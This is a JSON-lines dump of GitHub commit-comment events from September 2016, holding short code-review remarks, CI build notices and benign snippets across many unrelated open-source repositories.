{"id":"4549219460","type":"CommitCommentEvent","actor":{"login":"ltGuillaume"},"repo":{"name":"ltGuillaume/sonerezh"},"payload":{"comment":{"id":18984549,"position":null,"line":null,"path":null,"commit_id":"a4bf12ef69f4c0b07f63dd1aaf3753dfcff5b36d","created_at":"2016-09-12T13:17:29Z","updated_at":"2016-09-12T13:17:29Z","body":"I found a problem with the sorting. CakePHP passes on the order via the url for the next pages, but ONLY the first field, so after the first page it's still ordered by band, but not by album name anymore. There's supposed to be a workaround, but I can't seem to find out where it should go in Sonerezh: https://github.com/cakephp/cakephp/issues/7324#issuecomment-218321039"}},"created_at":"2016-09-12T13:17:29Z"}
{"id":"4549222064","type":"CommitCommentEvent","actor":{"login":"burak13"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18984562,"position":null,"line":null,"path":null,"commit_id":"35c393d367b6d8bcaac4cb459010e1b3e46f8a08","created_at":"2016-09-12T13:17:59Z","updated_at":"2016-09-12T13:17:59Z","body":"@mcostalba You argued adding 500 lines of code, but when I look at the code except two added files (where no one needs to look at to understand how SF works), this is just a minor change. I support your \"the more minimal code and readability the better\" approach, but I think you are overreacting for this one.  I suggest you take other developers' and maintainers' opinion on this before making the final decision (if the patch proves worthy)."}},"created_at":"2016-09-12T13:17:59Z"}
{"id":"4549223651","type":"CommitCommentEvent","actor":{"login":"robertswiecki"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":18984566,"position":null,"line":null,"path":null,"commit_id":"ac33183969efa54072d936ce7833f4da05e028d2","created_at":"2016-09-12T13:18:19Z","updated_at":"2016-09-12T13:18:19Z","body":"Thanks, fixed it in 561b9795da57308b120d7ebff6f00ad63f2faaf2. I hope it compiles cleanly on MacOS (unfortunately I don't have access to it now)."}},"created_at":"2016-09-12T13:18:19Z"}
{"id":"4549223834","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984567,"position":165,"line":232,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:18:21Z","updated_at":"2016-09-12T13:18:21Z","body":"Опять aside - замените на div или section, "}},"created_at":"2016-09-12T13:18:21Z"}
{"id":"4549227475","type":"CommitCommentEvent","actor":{"login":"KatoRyota"},"repo":{"name":"plusize-group-work-c/calendar"},"payload":{"comment":{"id":18984582,"position":222,"line":129,"path":"src/main/java/jp/co/plusize/calendar/web/AbstractWebMethod.java","commit_id":"45c6a5eabc29af8607ad85657be9f73fbfc7a4c7","created_at":"2016-09-12T13:19:02Z","updated_at":"2016-09-12T13:19:02Z","body":"全体的にソケット、ファイルのストリームをcloseしてる処理がないように見えるのですが、どこでやってるのでしょうか？\r\nもしリソース管理を全く考慮してない設計になっているのであれば、サーバーにデプロイするのが、ちょっと恐いなと思ったので、このような質問をしています。"}},"created_at":"2016-09-12T13:19:02Z"}
{"id":"4549228352","type":"CommitCommentEvent","actor":{"login":"xsuchy"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18984585,"position":null,"line":null,"path":null,"commit_id":"7f750b7c68f3a27fee8c2dbe52c381c2640c6c56","created_at":"2016-09-12T13:19:13Z","updated_at":"2016-09-12T13:19:13Z","body":"There should be only limited number (3 actually) of SRPM builders run in parallel. So it should not be a problem."}},"created_at":"2016-09-12T13:19:13Z"}
{"id":"4549229348","type":"CommitCommentEvent","actor":{"login":"ace2nutzer"},"repo":{"name":"ChronoMonochrome/Chrono_Kernel-1"},"payload":{"comment":{"id":18984588,"position":5,"line":715,"path":"arch/arm/configs/codina_defconfig","commit_id":"f561c5d71dd58e5bc273b0b5fd04a3d92a81b4f2","created_at":"2016-09-12T13:19:24Z","updated_at":"2016-09-12T13:19:24Z","body":"for what it's needed ? - I'm asking because it's disabled in my defconfig"}},"created_at":"2016-09-12T13:19:24Z"}
{"id":"4549229350","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984589,"position":20,"line":24,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:19:24Z","updated_at":"2016-09-12T13:19:24Z","body":".intro\r\n.intro--secondary"}},"created_at":"2016-09-12T13:19:24Z"}
{"id":"4549231464","type":"CommitCommentEvent","actor":{"login":"auryn-macmillan"},"repo":{"name":"night/discourse-auth-twitch"},"payload":{"comment":{"id":18984595,"position":null,"line":null,"path":null,"commit_id":"4228b83038943b50c8872691679502e876b9d94d","created_at":"2016-09-12T13:19:47Z","updated_at":"2016-09-12T13:19:47Z","body":"Oh that second backslask!\r\n\r\nThanks heaps!"}},"created_at":"2016-09-12T13:19:47Z"}
{"id":"4549234623","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984604,"position":null,"line":null,"path":null,"commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T13:20:26Z","updated_at":"2016-09-12T13:20:26Z","body":"Не увидела у вас центрирующий container. "}},"created_at":"2016-09-12T13:20:26Z"}
{"id":"4549235901","type":"CommitCommentEvent","actor":{"login":"RobertoGM"},"repo":{"name":"oasp-forge/oasp4js-rev"},"payload":{"comment":{"id":18984606,"position":null,"line":null,"path":null,"commit_id":"62d3ecd4e5fc52b7bafa672887a299f776f4fdb4","created_at":"2016-09-12T13:20:39Z","updated_at":"2016-09-12T13:20:39Z","body":"changes to implement #6  : i18n module "}},"created_at":"2016-09-12T13:20:39Z"}
{"id":"4549239555","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18984610,"position":null,"line":null,"path":null,"commit_id":"7f750b7c68f3a27fee8c2dbe52c381c2640c6c56","created_at":"2016-09-12T13:21:21Z","updated_at":"2016-09-12T13:21:21Z","body":"Docker sounds scary in this context, tbh.  That is why I am asking ... because if we need isolation, builders are already there.\r\nWhy we need containers here?"}},"created_at":"2016-09-12T13:21:21Z"}
{"id":"4549241699","type":"CommitCommentEvent","actor":{"login":"Parovozik"},"repo":{"name":"benvanik/xenia"},"payload":{"comment":{"id":18984615,"position":null,"line":null,"path":null,"commit_id":"bc0ddbb05a9872a72d6af0afc5caa464ddb1a417","created_at":"2016-09-12T13:21:44Z","updated_at":"2016-09-12T13:21:44Z","body":"Thanks! Now all works is fine!"}},"created_at":"2016-09-12T13:21:44Z"}
{"id":"4549241788","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18984617,"position":null,"line":null,"path":null,"commit_id":"1ed05c7d65e9e6b28153ea822995b0773fe2c3af","created_at":"2016-09-12T13:21:45Z","updated_at":"2016-09-12T13:21:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 983](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13132&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:57"}},"created_at":"2016-09-12T13:21:45Z"}
{"id":"4549245170","type":"CommitCommentEvent","actor":{"login":"Nayana-ibm"},"repo":{"name":"linux-on-ibm-z/boringssl"},"payload":{"comment":{"id":18984622,"position":null,"line":null,"path":null,"commit_id":"0abf3fd8e5a4499631e107025f989d5bd56c0c50","created_at":"2016-09-12T13:22:24Z","updated_at":"2016-09-12T13:22:24Z","body":"Reverted changes related to Linux s390x"}},"created_at":"2016-09-12T13:22:24Z"}
{"id":"4549245435","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18984624,"position":null,"line":null,"path":null,"commit_id":"7f750b7c68f3a27fee8c2dbe52c381c2640c6c56","created_at":"2016-09-12T13:22:27Z","updated_at":"2016-09-12T13:22:27Z","body":"Btw., even really long queue might be consider DoS."}},"created_at":"2016-09-12T13:22:27Z"}
{"id":"4549246851","type":"CommitCommentEvent","actor":{"login":"Ahmed-Samir-6446"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":18984633,"position":null,"line":null,"path":null,"commit_id":"0d570a506a1b51f5333c7741c47e714d55c35ab2","created_at":"2016-09-12T13:22:43Z","updated_at":"2016-09-12T13:22:43Z","body":"I expected that too and I made my own code with an array of TextViews which increase but I've used for loop like this \r\n\r\nint textViewCount = words.size();\r\n        TextView[] textViewArray = new TextView[textViewCount];\r\n        for (int i = 0; i < textViewCount; i++) {\r\n            textViewArray[i] = new TextView(this);\r\n        }\r\n        for (int index = 0; index < words.size(); index++) {\r\n            textViewArray[index].setText(words.get(index));\r\n            rootView.addView(textViewArray[index]);\r\n        }\r\n\r\n "}},"created_at":"2016-09-12T13:22:43Z"}
{"id":"4549252501","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984649,"position":31,"line":34,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:23:47Z","updated_at":"2016-09-12T13:23:47Z","body":".feature"}},"created_at":"2016-09-12T13:23:47Z"}
{"id":"4549254856","type":"CommitCommentEvent","actor":{"login":"andreiglingeanu"},"repo":{"name":"ThemeFuse/Unyson"},"payload":{"comment":{"id":18984653,"position":12,"line":135,"path":"framework/static/css/option-types.css","commit_id":"f102dd43e1978860c1fc7acd7c1375b3d2256e44","created_at":"2016-09-12T13:24:16Z","updated_at":"2016-09-12T13:24:16Z","body":"Why? It makes each `textarea` look like [this](https://cloud.githubusercontent.com/assets/2979628/18437379/4e4431d0-7905-11e6-933c-8710202380db.png).\r\n"}},"created_at":"2016-09-12T13:24:16Z"}
{"id":"4549255296","type":"CommitCommentEvent","actor":{"login":"jesperronn"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":18984652,"position":null,"line":null,"path":null,"commit_id":"547f16b58e54375b1d523cc6e2153993bf731875","created_at":"2016-09-12T13:24:13Z","updated_at":"2016-09-12T13:24:13Z","body":"It's worth noting on this commit that it references https://github.com/twbs/bootstrap/pull/17021, specifically the item \"Remove most `>` selectors and replace with un-nested classes.\"\r\n\r\nAs of writing, tables are not mentioned in the list in the V4 tracker, henceforth I mention it here.\r\n\r\n(maintainers, however, could add it to https://github.com/twbs/bootstrap/pull/17021 )"}},"created_at":"2016-09-12T13:24:13Z"}
{"id":"4549259604","type":"CommitCommentEvent","actor":{"login":"goligo"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18984664,"position":null,"line":null,"path":null,"commit_id":"348cdf88e51b0401c178d71d0756700ba479d37e","created_at":"2016-09-12T13:25:11Z","updated_at":"2016-09-12T13:25:11Z","body":"@ndown If you have an own idea of equality, you need to implement a custom comparator function to detect it. That is what I see in your code snippet. I still don't get what is wrong with only looking at the second property, if the first property is equal on both entries (comparator returns 0). "}},"created_at":"2016-09-12T13:25:11Z"}
{"id":"4549263784","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18984669,"position":null,"line":null,"path":null,"commit_id":"f05ee1ac2279f28ec456d813ca336fc72d51004c","created_at":"2016-09-12T13:25:57Z","updated_at":"2016-09-12T13:25:57Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 245](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1201&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:29"}},"created_at":"2016-09-12T13:25:57Z"}
{"id":"4549263943","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18984670,"position":null,"line":null,"path":null,"commit_id":"ba1092173089700f86815621e6ae281223889a0a","created_at":"2016-09-12T13:25:58Z","updated_at":"2016-09-12T13:25:58Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 246](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1202&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T13:25:58Z"}
{"id":"4549264339","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984671,"position":41,"line":44,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:26:03Z","updated_at":"2016-09-12T13:26:03Z","body":".benefit"}},"created_at":"2016-09-12T13:26:03Z"}
{"id":"4549265292","type":"CommitCommentEvent","actor":{"login":"bskfjhh"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":18984673,"position":null,"line":null,"path":null,"commit_id":"2f8de37d53b939898d73551cf9215e276a192d57","created_at":"2016-09-12T13:26:16Z","updated_at":"2016-09-12T13:26:16Z","body":"-- 恶魔变身（浩劫）\r\n                { spellID = 162264, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n                -- 恶魔变形（复仇）\r\n                { spellID = 187827, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n                -- 恶魔之魂\r\n                { spellID = 163073, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n                -- 恶魔尖刺\r\n                { spellID = 203819, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n                -- 献祭光环\r\n                { spellID = 178740, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n\t\t\t\t-- 混乱之刃\r\n                { spellID = 211048, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n\t\t\t\t-- 势如破竹\r\n                { spellID = 208628, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n\t\t\t\t-- 幻影打击\r\n                { spellID = 209426, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },"}},"created_at":"2016-09-12T13:26:16Z"}
{"id":"4549265837","type":"CommitCommentEvent","actor":{"login":"caryan"},"repo":{"name":"BBN-Q/Qlab"},"payload":{"comment":{"id":18984676,"position":null,"line":null,"path":null,"commit_id":"b66297b3990833459e0075f93437a4f5df5dea4b","created_at":"2016-09-12T13:26:21Z","updated_at":"2016-09-12T13:26:21Z","body":":confused: it must be just how the merge shows up in the GitHub for Windows client. For me it looks fine.\r\n\r\n```shell\r\n138b5fd (HEAD -> develop, origin/develop) Merge pull request #86 from BBN-Q/feature/CR-amp [GitHub]\r\n1b8059e Calibrate pule amplitude instead of channel [CoherenceController]\r\n4       3       experiments/muWaveDetection/CRCal.py\r\n7       3       experiments/muWaveDetection/CRCalSequence.m\r\n6       3       experiments/muWaveDetection/calibrateCR.m\r\n18      4       experiments/muWaveDetection/sweep_calibrateCR.m\r\n\r\n2eaf538 Minor Driver Updates [CoherenceController]\r\n5       3       common/+deviceDrivers/@NIDAQ/NIDAQ.m\r\n2       2       common/+deviceDrivers/Keysight34410A.m\r\n\r\nfef2877 Merge branch 'develop' of https://github.com/BBN-Q/Qlab into develop [CoherenceController]\r\nb66297b (origin/ew/devicedrivers) device drivers: NIQAQ wrapper; Keithley195A [CoherenceController]\r\n64      0       common/+deviceDrivers/@NIDAQ/NIDAQ.m\r\n36      0       common/+deviceDrivers/@NIDAQ/NIDAQai0.py\r\n36      0       common/+deviceDrivers/@NIDAQ/NIDAQai0ai1.py\r\n23      0       common/+deviceDrivers/@NIDAQ/take_data.py\r\n25      0       common/+deviceDrivers/@NIDAQ/take_data_2chan.py\r\n31      0       common/+deviceDrivers/HP8153A.m\r\n82      0       common/+deviceDrivers/Keithley195A.m\r\n155     38      common/+deviceDrivers/Keithley2400.m\r\n121     0       common/+deviceDrivers/Keysight34410A.m\r\n134     0       common/+deviceDrivers/SR7124.m\r\n33      4       common/+deviceDrivers/SRS830.m\r\n79      14      common/+deviceDrivers/SRS865.m\r\n\r\n5edd81f Merge pull request #85 from BBN-Q/fix/update_AC_pulses [GitHub]\r\nb711622 Merge pull request #84 from BBN-Q/feature/cal-pulse-freq [GitHub]\r\nc08e11a Merge pull request #82 from BBN-Q/fix/set-sweep-points [GitHub]\r\na7c2a73 In-place-update of all AC pulses [dieris]\r\n1       2       common/util/update_wf_lib.py\r\n\r\nd102fb2 Update corresponding CR pulses [dieris]\r\n8       0       common/util/updateQubitFreq.py\r\n```"}},"created_at":"2016-09-12T13:26:21Z"}
{"id":"4549266494","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":18984678,"position":null,"line":null,"path":null,"commit_id":"94158fbf1ca328fb282d7efe8bdaf39953526600","created_at":"2016-09-12T13:26:28Z","updated_at":"2016-09-12T13:26:28Z","body":"强无敌！\r\n@puchai"}},"created_at":"2016-09-12T13:26:28Z"}
{"id":"4549266570","type":"CommitCommentEvent","actor":{"login":"bskfjhh"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":18984679,"position":null,"line":null,"path":null,"commit_id":"2f8de37d53b939898d73551cf9215e276a192d57","created_at":"2016-09-12T13:26:29Z","updated_at":"2016-09-12T13:26:29Z","body":"-- 烈火烙印\r\n                { spellID = 207744, unitId = \"target\", caster = \"all\", filter = \"DEBUFF\" },\r\n\t\t\t\t-- 投掷利刃\r\n                { spellID = 207690, unitId = \"target\", caster = \"all\", filter = \"DEBUFF\" },\r\n\t\t\t\t-- 涅墨西斯\r\n                { spellID = 206491, unitId = \"target\", caster = \"all\", filter = \"DEBUFF\" },"}},"created_at":"2016-09-12T13:26:29Z"}
{"id":"4549269370","type":"CommitCommentEvent","actor":{"login":"bskfjhh"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":18984683,"position":null,"line":null,"path":null,"commit_id":"2f8de37d53b939898d73551cf9215e276a192d57","created_at":"2016-09-12T13:27:01Z","updated_at":"2016-09-12T13:27:01Z","body":"-- 物理敏捷DPS\r\n\t\t\t\t-- 安格博达的回忆\r\n                { spellID = 214807, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n                { spellID = 214803, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },\r\n                { spellID = 214802, unitId = \"player\", caster = \"player\", filter = \"BUFF\" },"}},"created_at":"2016-09-12T13:27:01Z"}
{"id":"4549270053","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984684,"position":193,"line":193,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:27:10Z","updated_at":"2016-09-12T13:27:10Z","body":"* Излишняя декомпозиция: ф-я выполняет слишком короткую и простую операцию и не подходит для повторного использования"}},"created_at":"2016-09-12T13:27:10Z"}
{"id":"4549271990","type":"CommitCommentEvent","actor":{"login":"bskfjhh"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":18984686,"position":null,"line":null,"path":null,"commit_id":"2f8de37d53b939898d73551cf9215e276a192d57","created_at":"2016-09-12T13:27:30Z","updated_at":"2016-09-12T13:27:30Z","body":"DH的，看到大神在更新，我加了一些"}},"created_at":"2016-09-12T13:27:30Z"}
{"id":"4549277013","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984698,"position":58,"line":61,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:28:25Z","updated_at":"2016-09-12T13:28:25Z","body":"span -> div"}},"created_at":"2016-09-12T13:28:25Z"}
{"id":"4549278268","type":"CommitCommentEvent","actor":{"login":"jhoeller"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":18984700,"position":20,"line":104,"path":"org.springframework.beans/src/main/java/org/springframework/beans/PropertyValue.java","commit_id":"ad492e906e4c9c994cad733d366ec9c30950ed92","created_at":"2016-09-12T13:28:38Z","updated_at":"2016-09-12T13:28:38Z","body":"We're using the source field to intentionally preserve the `PropertyValue` resolution chain here, not just the original source object. See `getOriginalPropertyValue()` below."}},"created_at":"2016-09-12T13:28:38Z"}
{"id":"4549278198","type":"CommitCommentEvent","actor":{"login":"ogsbot"},"repo":{"name":"ufz/ogs"},"payload":{"comment":{"id":18984702,"position":null,"line":null,"path":null,"commit_id":"606eb1bb44036a4035bbb4a53dc4a13739311a2e","created_at":"2016-09-12T13:28:39Z","updated_at":"2016-09-12T13:28:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Rprg3tds&#x2F;2-test\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Test</a>"}},"created_at":"2016-09-12T13:28:39Z"}
{"id":"4549281570","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":18984708,"position":5,"line":4,"path":"dokan/access.c","commit_id":"5f2079ad87c11992b2b5dc2d9f9b8f7af77f615f","created_at":"2016-09-12T13:29:16Z","updated_at":"2016-09-12T13:29:16Z","body":"I removed the commit :disappointed: not enough coffee this morning sorry."}},"created_at":"2016-09-12T13:29:16Z"}
{"id":"4549285762","type":"CommitCommentEvent","actor":{"login":"raprasad"},"repo":{"name":"IQSS/miniverse"},"payload":{"comment":{"id":18984719,"position":null,"line":null,"path":null,"commit_id":"6e03b7d8da55775404697b503cf25721e9b686c5","created_at":"2016-09-12T13:30:02Z","updated_at":"2016-09-12T13:30:02Z","body":"Fix. Close #44"}},"created_at":"2016-09-12T13:30:02Z"}
{"id":"4549286259","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18984721,"position":196,"line":196,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T13:30:10Z","updated_at":"2016-09-12T13:30:10Z","body":"Hardcoded values: Иинформация в логе расходится с реальным поведением"}},"created_at":"2016-09-12T13:30:10Z"}
{"id":"4549291670","type":"CommitCommentEvent","actor":{"login":"wesm"},"repo":{"name":"chrisaycock/pandas"},"payload":{"comment":{"id":18984728,"position":48,"line":418,"path":"pandas/src/joins_func_helper.pxi","commit_id":"15386bab3623c9380c85269fbce42e72bebe6be5","created_at":"2016-09-12T13:31:05Z","updated_at":"2016-09-12T13:31:05Z","body":"Better to use parentheses for continuations than backslashes"}},"created_at":"2016-09-12T13:31:05Z"}
{"id":"4549293673","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984732,"position":50,"line":45,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:31:27Z","updated_at":"2016-09-12T13:31:27Z","body":"passive voice. reword to active."}},"created_at":"2016-09-12T13:31:27Z"}
{"id":"4549294274","type":"CommitCommentEvent","actor":{"login":"RemiGuinier"},"repo":{"name":"ITGfrance/OdF2"},"payload":{"comment":{"id":18984733,"position":null,"line":null,"path":null,"commit_id":"51e87ba725e43549ade8b0d6fd7cc909af8336fa","created_at":"2016-09-12T13:31:33Z","updated_at":"2016-09-12T13:31:33Z","body":"Il faut également add .ssc pour Stepmania5"}},"created_at":"2016-09-12T13:31:33Z"}
{"id":"4549294571","type":"CommitCommentEvent","actor":{"login":"martinjhnhadley"},"repo":{"name":"ox-it/OxfordIDN_htmlwidgets"},"payload":{"comment":{"id":18984736,"position":null,"line":null,"path":null,"commit_id":"ff8266be22cc78582968d7c9cd4d8b9f3214966b","created_at":"2016-09-12T13:31:36Z","updated_at":"2016-09-12T13:31:36Z","body":"Fixes https://github.com/ox-it/OxfordIDN_htmlwidgets/issues/43"}},"created_at":"2016-09-12T13:31:36Z"}
{"id":"4549294577","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984737,"position":52,"line":47,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:31:36Z","updated_at":"2016-09-12T13:31:36Z","body":"Its"}},"created_at":"2016-09-12T13:31:36Z"}
{"id":"4549296070","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984740,"position":53,"line":48,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:31:54Z","updated_at":"2016-09-12T13:31:54Z","body":"Why?"}},"created_at":"2016-09-12T13:31:54Z"}
{"id":"4549297813","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984744,"position":50,"line":45,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:32:14Z","updated_at":"2016-09-12T13:32:14Z","body":"\"For the purposes of this guide\"... would you do it differently in a real system?"}},"created_at":"2016-09-12T13:32:14Z"}
{"id":"4549299136","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984752,"position":91,"line":94,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:32:25Z","updated_at":"2016-09-12T13:32:25Z","body":".btn.booking__btn"}},"created_at":"2016-09-12T13:32:25Z"}
{"id":"4549299294","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984753,"position":56,"line":51,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:32:26Z","updated_at":"2016-09-12T13:32:26Z","body":"Do you mean \"amenable?\""}},"created_at":"2016-09-12T13:32:26Z"}
{"id":"4549303368","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984769,"position":101,"line":104,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:33:13Z","updated_at":"2016-09-12T13:33:13Z","body":".social"}},"created_at":"2016-09-12T13:33:13Z"}
{"id":"4549304151","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18984772,"position":16,"line":120,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T13:33:21Z","updated_at":"2016-09-12T13:33:21Z","body":"I'd have revert the extra space in `MODULE` variables, but add the missing one in the 6 calls when there were missing with a single Vim command ^^ `:%s/MODULE\\s*<<\\s*\"\\zs\\ze\\S/ /g`\r\n\r\n(the calls are in  `ossimSentinel1Model::open`, case `if (!safeFile.empty())`).\r\n\r\nIt's not important though."}},"created_at":"2016-09-12T13:33:21Z"}
{"id":"4549304564","type":"CommitCommentEvent","actor":{"login":"alanevEugene"},"repo":{"name":"Eol217/202785-sedona"},"payload":{"comment":{"id":18984774,"position":102,"line":105,"path":"index.html","commit_id":"1e305e48dfc329f24687ca81505ec3e52fd940de","created_at":"2016-09-12T13:33:26Z","updated_at":"2016-09-12T13:33:26Z","body":".social__link"}},"created_at":"2016-09-12T13:33:26Z"}
{"id":"4549305782","type":"CommitCommentEvent","actor":{"login":"clime"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18984777,"position":null,"line":null,"path":null,"commit_id":"7f750b7c68f3a27fee8c2dbe52c381c2640c6c56","created_at":"2016-09-12T13:33:39Z","updated_at":"2016-09-12T13:33:39Z","body":"lxc-containers are the simplest way to get isolation."}},"created_at":"2016-09-12T13:33:39Z"}
{"id":"4549305902","type":"CommitCommentEvent","actor":{"login":"mtnygard"},"repo":{"name":"pedestal/pedestal-docs"},"payload":{"comment":{"id":18984778,"position":77,"line":72,"path":"content/guides/pedestal-with-component.adoc","commit_id":"2c56db0b35172c6e0db67686f2f6b29ce8608359","created_at":"2016-09-12T13:33:40Z","updated_at":"2016-09-12T13:33:40Z","body":"This could use some expansion. When we start implementing the component, what is our first concern? Why do we start by creating a record?  This guide shouldn't assume the reader has fully assimilated the ideas in Component."}},"created_at":"2016-09-12T13:33:40Z"}
{"id":"4549306039","type":"CommitCommentEvent","actor":{"login":"ndown"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18984779,"position":null,"line":null,"path":null,"commit_id":"348cdf88e51b0401c178d71d0756700ba479d37e","created_at":"2016-09-12T13:33:40Z","updated_at":"2016-09-12T13:33:40Z","body":"I see now! I think the problem might be very specific to my case. I am comparing only a substring: a.split(\"-\").splice(0,4).join(\"-\"). In the default comparator it obviously compares the whole string. So what I did was grouping by the truncated value. What I expected was sorting the values inside the specific group afterwards.\r\n\r\nMaybe it would be usefull to do deep sorting (return 0) when group name/key is same? "}},"created_at":"2016-09-12T13:33:40Z"}
